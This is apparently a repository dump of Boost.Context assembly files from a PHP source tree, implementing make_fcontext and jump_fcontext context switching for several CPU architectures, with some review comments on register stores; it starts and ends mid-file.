# set back-chain to zero
li 0, 0
std 0, 184(3)
# zero in r3 indicates first jump to context-function
std 0, 152(3)
# preserve the current LR in R0
mflr 0
# branch to the next instruction so LR receives the address of .Label
bl .Label
.Label:
# load LR into R4
mflr 4
# compute abs address of label .L_finish
addi 4, 4, .L_finish - .Label
# restore LR
mtlr 0
# save address of finish as return-address for context-function
# will be entered after context-function returns
std 4, 168(3)
# restore return address from R6
mtlr 6
blr # return pointer to context-data
.L_finish:
# save return address into R0
mflr 0
# save return address on stack, set up stack frame
std 0, 8(1)
# allocate stack space, R1 % 16 == 0
stdu 1, -32(1)
# exit code is zero
li 3, 0
# exit application
bl ._exit
nop
|
Aidam7/PHavirP
| 7,302
|
Zend/asm/jump_ppc64_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc64_sysv_elf_gas.S"
/* transfer_t jump_fcontext( fcontext_t const to, void * data)
   ELFv2 (_CALL_ELF == 2): r3 = context to jump to, r4 = data;
                           transfer_t is returned in r3/r4.
   ELFv1: r3 = hidden pointer where the returned transfer_t is stored,
          r4 = context to jump to, r5 = data. */
.globl jump_fcontext
#if _CALL_ELF == 2
.text
.align 2
jump_fcontext:
addis %r2, %r12, .TOC.-jump_fcontext@ha
addi %r2, %r2, .TOC.-jump_fcontext@l
.localentry jump_fcontext, . - jump_fcontext
#else
.section ".opd","aw"
.align 3
jump_fcontext:
# ifdef _CALL_LINUX
.quad .L.jump_fcontext,.TOC.@tocbase,0
.type jump_fcontext,@function
.text
.align 2
.L.jump_fcontext:
# else
.hidden .jump_fcontext
.globl .jump_fcontext
.quad .jump_fcontext,.TOC.@tocbase,0
.size jump_fcontext,24
.type .jump_fcontext,@function
.text
.align 2
.jump_fcontext:
# endif
#endif
# reserve space on stack
subi %r1, %r1, 184
#if _CALL_ELF != 2
std %r2, 0(%r1) # save TOC
#endif
std %r14, 8(%r1) # save R14
std %r15, 16(%r1) # save R15
std %r16, 24(%r1) # save R16
std %r17, 32(%r1) # save R17
std %r18, 40(%r1) # save R18
std %r19, 48(%r1) # save R19
std %r20, 56(%r1) # save R20
std %r21, 64(%r1) # save R21
std %r22, 72(%r1) # save R22
std %r23, 80(%r1) # save R23
std %r24, 88(%r1) # save R24
std %r25, 96(%r1) # save R25
std %r26, 104(%r1) # save R26
std %r27, 112(%r1) # save R27
std %r28, 120(%r1) # save R28
std %r29, 128(%r1) # save R29
std %r30, 136(%r1) # save R30
std %r31, 144(%r1) # save R31
#if _CALL_ELF != 2
std %r3, 152(%r1) # save hidden
#endif
# save CR
mfcr %r0
std %r0, 160(%r1)
# save LR
mflr %r0
std %r0, 168(%r1)
# save LR as PC
std %r0, 176(%r1)
# store RSP (pointing to context-data) in R6
mr %r6, %r1
#if _CALL_ELF == 2
# restore RSP (pointing to context-data) from R3
mr %r1, %r3
#else
# restore RSP (pointing to context-data) from R4
mr %r1, %r4
ld %r2, 0(%r1) # restore TOC
#endif
ld %r14, 8(%r1) # restore R14
ld %r15, 16(%r1) # restore R15
ld %r16, 24(%r1) # restore R16
ld %r17, 32(%r1) # restore R17
ld %r18, 40(%r1) # restore R18
ld %r19, 48(%r1) # restore R19
ld %r20, 56(%r1) # restore R20
ld %r21, 64(%r1) # restore R21
ld %r22, 72(%r1) # restore R22
ld %r23, 80(%r1) # restore R23
ld %r24, 88(%r1) # restore R24
ld %r25, 96(%r1) # restore R25
ld %r26, 104(%r1) # restore R26
ld %r27, 112(%r1) # restore R27
ld %r28, 120(%r1) # restore R28
ld %r29, 128(%r1) # restore R29
ld %r30, 136(%r1) # restore R30
ld %r31, 144(%r1) # restore R31
#if _CALL_ELF != 2
ld %r3, 152(%r1) # restore hidden
#endif
# restore CR
ld %r0, 160(%r1)
mtcr %r0
# restore LR
ld %r0, 168(%r1)
mtlr %r0
# load PC
ld %r12, 176(%r1)
# move PC into CTR for the indirect branch below
mtctr %r12
# adjust stack
addi %r1, %r1, 184
#if _CALL_ELF == 2
# copy transfer_t into transfer_fn arg registers
mr %r3, %r6
# arg pointer already in %r4
# jump to context
bctr
.size jump_fcontext, .-jump_fcontext
#else
# zero in r3 indicates first jump to context-function
cmpdi %r3, 0
beq use_entry_arg
# return transfer_t
std %r6, 0(%r3)
std %r5, 8(%r3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr %r3, %r6
mr %r4, %r5
# jump to context
bctr
# ifdef _CALL_LINUX
.size .jump_fcontext, .-.L.jump_fcontext
# else
.size .jump_fcontext, .-.jump_fcontext
# endif
#endif
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,661
|
Zend/asm/make_mips32_o32_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | F20 | F22 | F24 | F26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | F28 | F30 | S0 | S1 | S2 | S3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | S4 | S5 | S6 | S7 | FP |hiddn| RA | PC | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | ABI ARGS | GP | FCTX| DATA| | *
* ------------------------------------------------- *
* *
* *****************************************************/
.file "make_mips32_o32_elf_gas.S"
# fcontext_t make_fcontext( void * sp, std::size_t size, void (* fn)( transfer_t ) );
# MIPS32 O32 ABI.
# In:  $a0 = top of the context-stack, $a2 = context-function.
#      ($a1, the stack size, is not used by this routine.)
# Out: $v0 = pointer to the initialized context-data record
#      (layout per the diagram above: fn at 92, $gp at 112, RA at 88).
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
.ent make_fcontext
make_fcontext:
#ifdef __PIC__
.set noreorder
.cpload $t9
.set reorder
#endif
# shift address in A0 to lower 16 byte boundary
li $v1, -16 # 0xfffffffffffffff0
and $v0, $v1, $a0
# reserve space for context-data on context-stack
# includes an extra 32 bytes for:
# - 16-byte incoming argument area required by mips ABI used when
# jump_context calls the initial function
# - 4 bytes to save our GP register used in finish
# - 8 bytes to as space for transfer_t returned to finish
# - 4 bytes for alignment
addiu $v0, $v0, -128
# third arg of make_fcontext() == address of context-function
sw $a2, 92($v0)
# save global pointer in context-data
sw $gp, 112($v0)
# compute address of returned transfer_t
addiu $t0, $v0, 116
sw $t0, 84($v0)
# compute abs address of label finish
la $t9, finish
# save address of finish as return-address for context-function
# will be entered after context-function returns
sw $t9, 88($v0)
jr $ra # return pointer to context-data
finish:
# entered only if the context-function returns
# reload our gp register (needed for la)
lw $gp, 16($sp)
# call _exit(0)
# the previous function should have left the 16 bytes incoming argument
# area on the stack which we reuse for calling _exit
la $t9, _exit
move $a0, $zero
jr $t9
.end make_fcontext
.size make_fcontext, .-make_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,950
|
Zend/asm/make_ppc64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | R13 | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | FCTX | DATA | | | *
* ------------------------------------------------- *
 *                                                     *
 *******************************************************/
.text
.globl _make_fcontext
_make_fcontext:
; fcontext_t make_fcontext( void * sp, std::size_t size, void (* fn)( transfer_t ) );
; PPC64 Mach-O: R3 = top of the context-stack, R5 = context-function.
; Returns the pointer to the initialized context-data in R3.
; NOTE(review): several stores below use the 32-bit forms (stw/stwu)
; and clrrwi on a 64-bit target while neighbouring slots use std;
; confirm the load widths in the matching jump_ppc64_sysv_macho_gas.S
; before relying on this file.
; save return address into R6
mflr r6
; first arg of make_fcontext() == top address of context-function
; shift address in R3 to lower 16 byte boundary
; NOTE(review): clrrwi operates on the low 32 bits; clrrdi is the
; 64-bit form — confirm which is intended here
clrrwi r3, r3, 4
; reserve space for context-data on context-stack
; including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi r3, r3, 240
; third arg of make_fcontext() == address of context-function
; NOTE(review): stw stores only the low 32 bits of R5 into the PC
; slot (offset 176 per the layout above); confirm whether std is
; intended, since the jump code presumably reads this slot as 64-bit
stw r5, 176(r3)
; set back-chain to zero
li r0, 0
std r0, 184(r3)
; compute address of returned transfer_t
addi r0, r3, 224
mr r4, r0
std r4, 152(r3)
; load LR
mflr r0
; jump to label 1
bl l1
l1:
; load LR into R4
mflr r4
; compute abs address of label finish
addi r4, r4, lo16((finish - .) + 4)
; restore LR
mtlr r0
; save address of finish as return-address for context-function
; will be entered after context-function returns
std r4, 168(r3)
; restore return address from R6
mtlr r6
blr ; return pointer to context-data
finish:
; entered only if the context-function returns
; save return address into R0
mflr r0
; save return address on stack, set up stack frame
; NOTE(review): 32-bit stw of LR at 8(r1) — the 64-bit ABI keeps the
; LR save slot at 16(r1) and would use std; confirm
stw r0, 8(r1)
; allocate stack space, R1 % 16 == 0
stwu r1, -32(r1)
; set return value to zero
li r3, 0
; exit application
bl __exit
nop
|
Aidam7/PHavirP
| 3,613
|
Zend/asm/make_i386_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| EDI | ESI | EBX | EBP | EIP | to | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | | *
* ---------------------------------------------------------------------------------- *
* | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _make_fcontext
.align 2
_make_fcontext:
/* fcontext_t make_fcontext( void * sp, std::size_t size,
   void (* fn)( transfer_t ) );
   i386 Mach-O, cdecl: all arguments on the stack, result in EAX.
   Builds a context-data record at the top of the supplied stack.
   The first jump into the new context enters `trampoline`, which
   forwards the transfer_t and tail-jumps to the function held in
   EBX; `finish` runs only if the context-function ever returns. */
/* first arg of make_fcontext() == top of context-stack */
movl 0x4(%esp), %eax
/* reserve space for first argument of context-function
eax might already point to a 16byte border */
leal -0x8(%eax), %eax
/* shift address in EAX to lower 16 byte boundary */
andl $-16, %eax
/* reserve space for context-data on context-stack, and align the stack */
leal -0x34(%eax), %eax
/* third arg of make_fcontext() == address of context-function */
/* stored in EBX */
movl 0xc(%esp), %ecx
movl %ecx, 0x10(%eax)
/* save MMX control- and status-word */
stmxcsr (%eax)
/* save x87 control-word */
fnstcw 0x4(%eax)
/* compute abs address of label trampoline */
/* (call/pop is the i386 PIC idiom for reading EIP) */
call 1f
/* address of trampoline 1 */
1: popl %ecx
/* compute abs address of label trampoline */
addl $trampoline-1b, %ecx
/* save address of trampoline as return address */
/* will be entered after calling jump_fcontext() first time */
movl %ecx, 0x18(%eax)
/* compute abs address of label finish */
call 2f
/* address of label 2 */
2: popl %ecx
/* compute abs address of label finish */
addl $finish-2b, %ecx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movl %ecx, 0x14(%eax)
ret /* return pointer to context-data */
trampoline:
/* move transport_t for entering context-function */
movl %eax, (%esp)
movl %edx, 0x4(%esp)
/* EBP holds the address of finish; push it as the return address */
pushl %ebp
/* jump to context-function */
jmp *%ebx
finish:
/* exit code is zero */
xorl %eax, %eax
movl %eax, (%esp)
/* exit application */
call __exit
hlt
|
Aidam7/PHavirP
| 5,840
|
Zend/asm/jump_x86_64_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | R12 | R13 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R14 | R15 | RBX | RBP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ---------------------------------------------------------------------------------- *
* | 0x40 | 0x44 | | *
* ---------------------------------------------------------------------------------- *
* | RIP | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
# if defined __CET__
# include <cet.h>
# define SHSTK_ENABLED (__CET__ & 0x2)
# define BOOST_CONTEXT_SHADOW_STACK (SHSTK_ENABLED && SHADOW_STACK_SYSCALL)
# else
# define _CET_ENDBR
# endif
.file "jump_x86_64_sysv_elf_gas.S"
/* transfer_t jump_fcontext( fcontext_t const to, void * vp );
   SysV AMD64 ABI: RDI = target fcontext, RSI = data.
   Saves the callee-saved registers (plus mxcsr/x87 control word,
   optional TLS stack guard, and — with CET enabled — the shadow
   stack pointer) on the current stack, switches RSP to the target
   context-data, restores that context's state and jumps to its
   saved return address with the transfer_t in RAX/RDX and RDI/RSI.
   Fix: the BOOST_CONTEXT_SHADOW_STACK save block was duplicated,
   reserving the 8-byte SSP slot twice on the save path while the
   restore path pops it only once; that skewed every offset in the
   context-data record (return address at 0x40, etc.) by 8 bytes.
   Exactly one save block is kept below. */
.text
.globl jump_fcontext
.type jump_fcontext,@function
.align 16
jump_fcontext:
_CET_ENDBR
leaq -0x40(%rsp), %rsp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%rsp) /* save MMX control- and status-word */
fnstcw 0x4(%rsp) /* save x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movq %fs:0x28, %rcx /* read stack guard from TLS record */
movq %rcx, 0x8(%rsp) /* save stack guard */
#endif
movq %r12, 0x10(%rsp) /* save R12 */
movq %r13, 0x18(%rsp) /* save R13 */
movq %r14, 0x20(%rsp) /* save R14 */
movq %r15, 0x28(%rsp) /* save R15 */
movq %rbx, 0x30(%rsp) /* save RBX */
movq %rbp, 0x38(%rsp) /* save RBP */
#if BOOST_CONTEXT_SHADOW_STACK
/* grow the stack to reserve space for shadow stack pointer(SSP) */
leaq -0x8(%rsp), %rsp
/* read the current SSP and store it */
rdsspq %rcx
movq %rcx, (%rsp)
#endif
/* store RSP (pointing to context-data) in RAX */
movq %rsp, %rax
/* restore RSP (pointing to context-data) from RDI */
movq %rdi, %rsp
#if BOOST_CONTEXT_SHADOW_STACK
/* first 8 bytes are SSP */
movq (%rsp), %rcx
leaq 0x8(%rsp), %rsp
/* Restore target(new) shadow stack */
rstorssp -8(%rcx)
/* restore token for previous shadow stack is pushed */
/* on previous shadow stack after saveprevssp */
saveprevssp
/* when return, jump_fcontext jump to restored return address */
/* (r8) instead of RET. This miss of RET implies us to unwind */
/* shadow stack accordingly. Otherwise mismatch occur */
movq $1, %rcx
incsspq %rcx
#endif
movq 0x40(%rsp), %r8 /* restore return-address */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%rsp) /* restore MMX control- and status-word */
fldcw 0x4(%rsp) /* restore x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movq 0x8(%rsp), %rdx /* load stack guard */
movq %rdx, %fs:0x28 /* restore stack guard to TLS record */
#endif
movq 0x10(%rsp), %r12 /* restore R12 */
movq 0x18(%rsp), %r13 /* restore R13 */
movq 0x20(%rsp), %r14 /* restore R14 */
movq 0x28(%rsp), %r15 /* restore R15 */
movq 0x30(%rsp), %rbx /* restore RBX */
movq 0x38(%rsp), %rbp /* restore RBP */
leaq 0x48(%rsp), %rsp /* prepare stack */
/* return transfer_t from jump */
#if !defined(_ILP32)
/* RAX == fctx, RDX == data */
movq %rsi, %rdx
#else
/* RAX == data:fctx */
salq $32, %rsi
orq %rsi, %rax
#endif
/* pass transfer_t as first arg in context function */
#if !defined(_ILP32)
/* RDI == fctx, RSI == data */
#else
/* RDI == data:fctx */
#endif
movq %rax, %rdi
/* indirect jump to context */
jmp *%r8
.size jump_fcontext,.-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,827
|
Zend/asm/make_ppc32_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F30 | F31 | fpscr | R13 | R14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | R15 | R16 | R17 | R18 | R19 | R20 | R21 | R22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | R23 | R24 | R25 | R26 | R27 | R28 | R29 | R30 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | R31 |hiddn| CR | LR | PC |bchai|linkr| FCTX| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | | *
* ------------------------------------------------- *
* | 256 | | *
* ------------------------------------------------- *
* | DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _make_fcontext
.align 2
_make_fcontext:
; fcontext_t make_fcontext( void * sp, std::size_t size, void (* fn)( transfer_t ) );
; PPC32 Mach-O: R3 = top of the context-stack, R5 = context-function.
; Returns the context-data pointer in R3. The record is set up so the
; first jump enters Ltrampoline (PC slot, offset 240), which forwards
; transfer_t in R3:R4 to the context-function kept in R31 (offset 224);
; Lfinish (LR slot, offset 236) runs if the context-function returns.
; save return address into R6
mflr r6
; first arg of make_fcontext() == top address of context-function
; shift address in R3 to lower 16 byte boundary
clrrwi r3, r3, 4
; reserve space for context-data on context-stack
; including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi r3, r3, 336
; third arg of make_fcontext() == address of context-function
; store as trampoline's R31
stw r5, 224(r3)
; set back-chain to zero
li r0, 0
stw r0, 244(r3)
mffs f0 ; load FPSCR
stfd f0, 144(r3) ; save FPSCR
; compute address of returned transfer_t
addi r0, r3, 252
mr r4, r0
stw r4, 228(r3)
; load LR
mflr r0
; jump to label 1
; (bcl 20,31 is the PC-read idiom: branch-and-link to the next insn)
bcl 20, 31, L1
L1:
; load LR into R4
mflr r4
; compute abs address of trampoline, use as PC
addi r5, r4, lo16(Ltrampoline - L1)
stw r5, 240(r3)
; compute abs address of label finish
addi r4, r4, lo16(Lfinish - L1)
; restore LR
mtlr r0
; save address of finish as return-address for context-function
; will be entered after context-function returns
stw r4, 236(r3)
; restore return address from R6
mtlr r6
blr ; return pointer to context-data
Ltrampoline:
; We get R31 = context-function, R3 = address of transfer_t,
; but we need to pass R3:R4 = transfer_t.
mtctr r31
lwz r4, 4(r3)
lwz r3, 0(r3)
bctr
Lfinish:
; entered only if the context-function returns
; load address of _exit into CTR
bcl 20, 31, L2
L2:
mflr r4
addis r4, r4, ha16(Lexitp - L2)
lwz r4, lo16(Lexitp - L2)(r4)
mtctr r4
; exit code is zero
li r3, 0
; exit application
bctr
.const_data
.align 2
Lexitp:
; pointer through which Lfinish reaches _exit
.long __exit
|
Aidam7/PHavirP
| 4,087
|
Zend/asm/make_s390x_sysv_elf_gas.S
|
/*******************************************************
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | t.fctx | t.data | r2 | r6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | r7 | r8 | r9 | r10 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | r11 | r12 | r13 | r14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 104 | 112 | 120 | *
* ------------------------------------------------- *
* | f8 | f9 | f10 | f11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 136 | 144 | 152 | *
* ------------------------------------------------- *
* | f12 | f13 | f14 | f15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 168 | 176 | | *
* ------------------------------------------------- *
* | fpc | pc | | | *
* ------------------------------------------------- *
*******************************************************/
.text
.align 8
.global make_fcontext
.type make_fcontext, @function
/* Offsets into the context-data record; see the layout diagram above. */
#define ARG_OFFSET 0
#define GR_OFFSET 16
#define R14_OFFSET 88
#define FP_OFFSET 96
#define FPC_OFFSET 160
#define PC_OFFSET 168
#define CONTEXT_SIZE 176
/*
fcontext_t make_fcontext( void * sp, std::size_t size, void (* fn)( transfer_t) );
Create and return a context below SP to call FN.
Incoming args
r2 - The stack location where to create the context
r3 - The size of the context
r4 - The address of the context function
*/
make_fcontext:
.machine "z10"
/* Align the stack to a 16 byte boundary (nill clears the low 4 bits). */
nill %r2,0xfff0
/* Allocate stack space for the context. */
aghi %r2,-CONTEXT_SIZE
/* Set the r2 save slot to zero. This indicates jump_fcontext
that this is a special context. */
mvghi GR_OFFSET(%r2),0
/* Save the floating point control register. */
